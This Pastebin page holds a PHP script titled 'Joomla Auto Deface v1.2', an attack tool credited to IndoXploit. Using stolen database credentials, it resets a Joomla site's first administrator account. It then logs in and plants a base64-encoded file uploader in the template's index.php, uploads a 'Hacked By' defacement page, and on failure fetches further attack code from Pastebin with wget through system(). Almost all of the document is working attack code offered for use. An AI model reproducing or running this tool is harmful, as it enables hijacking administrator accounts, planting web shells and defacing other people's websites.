Tu5b0l3d

Auto Deface Joomla if you get config v1.2

Dec 8th, 2015
428
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 10.31 KB | None | 0 0
  1. <?php
  2.  
  3. //Tu5b0l3d
  4. //thx to: IndoXploit
  5.  
  6. error_reporting(0);
  7.     if($_POST['submitt']){
  8.  
  9.        
  10. function pereg($anu,$pereg){
  11.                     $ch2 = curl_init ("$anu");
  12.                     curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
  13.                    curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
  14.                     curl_setopt ($ch2, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  15.                     curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
  16.                     curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
  17.                     curl_setopt($ch2, CURLOPT_COOKIEJAR,'coker_log');
  18.                     curl_setopt($ch2, CURLOPT_COOKIEFILE,'coker_log');
  19.                     $data = curl_exec ($ch2);
  20.                                                      
  21.                         preg_match("/$pereg/", $data, $token1);
  22.                         return $token1[1];
  23. }
  24.  
  25. function ngecurl($sites){
  26.         $ch1 = curl_init ("$sites");
  27. curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
  28. curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
  29. curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  30. curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
  31. curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
  32. curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
  33. curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
  34. $data = curl_exec ($ch1);
  35. return $data;
  36.     }
  37.  
  38. function ambilkata($param, $kata1, $kata2){
  39.     if(strpos($param, $kata1) === FALSE) return FALSE;
  40.     if(strpos($param, $kata2) === FALSE) return FALSE;
  41.     $start = strpos($param, $kata1) + strlen($kata1);
  42.     $end = strpos($param, $kata2, $start);
  43.     $return = substr($param, $start, $end - $start);
  44.     return $return;
  45. }
  46.  
  47. function lohgin($fak1,$fak2,$fak3,$fak4,$fak5){
  48.     $post2 = array(
  49.                     "username" => "$fak1",
  50.                     "passwd" => "$fak2",
  51.                     "lang" => "en-GB",
  52.                     "option" => "com_login",
  53.                     "task" => "login",
  54.                     "return" => "$fak3",
  55.                     "$fak4" => "1",
  56.                    
  57.                     );
  58.  
  59. $ch = curl_init ("$fak5");
  60. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  61. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  62. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  63. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  64. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  65. curl_setopt ($ch, CURLOPT_POST, 1);
  66. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post2);
  67. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  68. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  69. $prett = curl_exec($ch);
  70. return $prett;
  71. }
  72.  
  73.         $host = $_POST['host'];
  74.         $username = $_POST['username'];
  75.         $password = $_POST['password'];
  76.         $db = $_POST['db'];
  77.         $dbprefix = $_POST['dbprefix'];
  78.         $user_baru = $_POST['user_baru'];
  79.         $password_baru = $_POST['password_baru'];
  80.         $tanya = $_POST['tanya'];
  81.         $target = $_POST['target'];
  82.         $hackedby = $_POST['hackedby'];
  83.         $prefix = $dbprefix."users";
  84.         $pass = md5("$password_baru");
  85.         $upda = $db.".".$dbprefix;
  86.  
  87.  
  88.         mysql_connect($host,$username,$password);
  89.  
  90.         mysql_select_db($db);
  91.  
  92.  
  93.  $tampil=mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  94.     $r=mysql_fetch_array($tampil);
  95.         $id = $r[id];
  96.        
  97.          mysql_query("UPDATE $prefix SET password='$pass',username='$user_baru' WHERE id='$id'");
  98.  
  99.                                  
  100.             if ($tanya == "y"){
  101.  
  102.                 $path = "/administrator/index.php?option=com_templates&view=templates";
  103.                 $site = $target.$path;
  104.                 $token1 = pereg($site, '<input type=\"hidden\" name=\"return\" value=\"(.*?)\" \/>');
  105.                 $token2 = pereg($site, '<input type=\"hidden\" name=\"(.*?)\" value=\"1\" \/>');
  106.                
  107.  
  108. //Login            
  109. $aso2 = lohgin($user_baru,$password_baru,$token1,$token2,$site);
  110. $aso = ngecurl($site);
  111.  
  112. $id = ambilkata($aso, "/administrator/index.php?option=com_templates&amp;view=template&amp;id=","&amp;file=aG9tZQ==\">");
  113. echo "# ID -> $id .... <br>";
  114. $file_index = base64_encode("/index.php");
  115.  
  116. $akaa = "/administrator/index.php?option=com_templates&view=template&id=$id&file=$file_index";
  117. $ak = $target.$akaa;
  118.  
  119. $fakk = ngecurl($ak);
  120.  
  121. $ambil_extensi = ambilkata($fakk, 'id="jform_extension_id" value="','" />');
  122. $file_value = ambilkata($fakk, 'id="jform_filename" value="','" />');
  123. $nama_template = ambilkata($fakk, 'Editing file &quot;/index.php&quot; in template &quot;','&quot;.</p>');
  124. echo "# jform_extension_id -> $ambil_extensi<br>";
  125. echo "# filename -> $file_value<br>";
  126. echo "# Template -> $nama_template<br>";
  127.  
  128.  
  129. $upload = base64_decode("Z3cgZ2FudGVuZw0KPD9waHANCiAgJGZpbGUgPSAkX0ZJTEVTWydmaWxlJ107DQogICRuZXdmaWxlPSJrLnBocCI7DQoJCWlmIChmaWxlX2V4aXN0cygiLi4vLi4vIi4kbmV3ZmlsZSkpIHVubGluaygiLi4uLi8vIi4kbmV3ZmlsZSk7DQogICAgCW1vdmVfdXBsb2FkZWRfZmlsZSgkZmlsZVsndG1wX25hbWUnXSwgIi4uLy4uLyRuZXdmaWxlIik7DQo/Pg0K");
  130. $coeg = "$target/administrator/index.php?option=com_templates&view=template&id=$id&file=$file_index";
  131. echo "# $coeg<br>";
  132. echo "# Uploading...<br>";
  133. $token3 = pereg($coeg, '<input type=\"hidden\" name=\"(.*?)\" value=\"1\" \/>');
  134.  
  135. echo "# Token3 -> $token3<br>";
  136. $post2 = array(
  137.                     "jform[source]" => "$upload",
  138.                     "task" => "template.save",
  139.                     "$token3" => "1",
  140.                     "jform[extension_id]"=> "$ambil_extensi",
  141.                     "jform[filename]" => "$file_value",
  142.                     );
  143.  
  144. $ch3 = curl_init ("$coeg");
  145. curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
  146. curl_setopt ($ch3, CURLOPT_FOLLOWLOCATION, 1);
  147. curl_setopt ($ch3, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  148. curl_setopt ($ch3, CURLOPT_SSL_VERIFYPEER, 0);
  149. curl_setopt ($ch3, CURLOPT_SSL_VERIFYHOST, 0);
  150. curl_setopt ($ch3, CURLOPT_POST, 1);
  151. curl_setopt ($ch3, CURLOPT_POSTFIELDS, $post2);
  152. curl_setopt($ch3, CURLOPT_COOKIEJAR,'coker_log');
  153. curl_setopt($ch3, CURLOPT_COOKIEFILE,'coker_log');
  154. $masuk22 = curl_exec ($ch3);
  155.  
  156. $uploader = "$target/templates/$nama_template/index.php";
  157. $masuk2 = ngecurl($uploader);
  158. if(preg_match("#ganteng#is", $masuk2)){
  159. echo "# uploader udh ketanem...<br>";
  160. echo "# lanjut mepes...<br>";
  161.  
  162. $www = "m.php";
  163. $fp5 = fopen($www,"w");
  164. fputs($fp5,$hackedby);
  165.  
  166. $ch4 =curl_init("$target/templates/$nama_template/index.php");
  167.                             curl_setopt($ch4, CURLOPT_POST, true);
  168.                             curl_setopt($ch4, CURLOPT_POSTFIELDS,
  169.                             array('file'=>"@$www"));
  170.                             curl_setopt($ch4, CURLOPT_RETURNTRANSFER, 1);
  171.                             curl_setopt ($ch4, CURLOPT_SSL_VERIFYPEER, 0);
  172.                             curl_setopt ($ch4, CURLOPT_SSL_VERIFYHOST, 0);
  173.                             $postResult = curl_exec($ch4);
  174.                             curl_close($ch4);
  175.  
  176.  
  177.    $ch5 = "$target/k.php";
  178. $file2 = @file_get_contents($ch5);
  179.                            
  180.  
  181.                      if(preg_match('#hacked#is', $file2)){
  182.                         echo "# <font color='green'>berhasil mepes...</font><br>";
  183.                         echo "$target/k.php<br>";
  184.                     }
  185.                     else{
  186.                         echo "# <font color='red'>gagal mepes...</font><br>";
  187.                         echo "# coba aja manual: <br>";
  188.                         echo "# $target/administrator<br>";
  189.                         echo "# username: $user_baru<br>";
  190.                         echo "# password: $password_baru<br>";
  191.  
  192.                        
  193.                     }
  194.                
  195.  
  196.  
  197. }
  198. else{
  199.     echo "# failed<br>";
  200.     echo "# data udh bener. beda versi joomla mungkin :(<br>";
  201.     echo "# coba aja manual: <br>";
  202.     echo "# $target/administrator<br>";
  203.     echo "# username: $user_baru<br>";
  204.     echo "# password: $password_baru<br><br>";
  205.      echo "# atau coba yg path 2<br>";
  206.     system('wget http://pastebin.com/raw.php?i=HgWSj00f');
  207.     system('cp raw.php?i=HgWSj00f joomla-2.php');
  208.     echo "<a href='joomla-3.php' style='text-decoration:none;'>Disini..</a><br>";
  209. }
  210.  
  211.             }
  212.             elseif($tanya == "n"){
  213.             echo "# Sukses<br>";
  214.             echo "# username: $user_baru<br>";
  215.             echo "# password: $password_baru<br>";
  216.  
  217.             }
  218.        
  219.  
  220.         }
  221.  
  222.         else{
  223.  
  224.             echo '<html>
  225.  
  226.    <head>
  227.  
  228.        <title>Joomla Auto Deface v1.2</title>
  229.  
  230.    </head>
  231.    <body>
  232.            <center>
  233.                
  234.                        <h2>Joomla | created by IndoXploit</h2>
  235.  
  236.                        <table>
  237.  
  238.                            <tr><td><form method="post" action="?action"></td></tr>
  239.  
  240.                            <tr><td><input type="text" name="host" placeholder="localhost"></td></tr>
  241.  
  242.                            <tr><td><input type="text" name="username" placeholder="User DB"></td></tr>
  243.  
  244.                            <tr><td><input type="text" name="password" placeholder="Password DB"></td></tr>
  245.  
  246.                            <tr><td><input type="text" name="db" placeholder="Database"></td></tr>
  247.  
  248.                            <tr><td><input type="text" name="dbprefix" placeholder="dbprefix"></td></tr>
  249.  
  250.                            <tr><td><input type="text" name="user_baru" placeholder="Username Baru"></td></tr>
  251.  
  252.                            <tr><td><input type="text" name="password_baru" placeholder="Password Baru"></td></tr>
  253.                            <tr><td></td></tr>
  254.                            <tr><td></td></tr>
  255.                          
  256.  
  257.                            <tr><td> Auto Deface <input type="radio" name="tanya" value="y"> y <input type="radio" name="tanya" value="n"> n</td></tr>
  258.                             <tr><td><input type="text" name="target" placeholder="www.IndoXploit.org"></td></tr>
  259.                             <tr><td><input type="text" name="hackedby" placeholder="Hacked By Tu5b0l3d"></td></tr>
  260.  
  261.                            <tr><td><input type="submit" value="Submit" name="submitt"></td></tr>
  262.  
  263.                        </table>
  264.                        *nb: kalo milih y ... silahkan masukin nama sitenya, kalo ngk tau nama sitenya, pilih n
  265.  
  266.            </center>
  267.  
  268.    </body>';
  269.  
  270.         }
  271.  
  272. ?>
Add Comment
Please, Sign In to add comment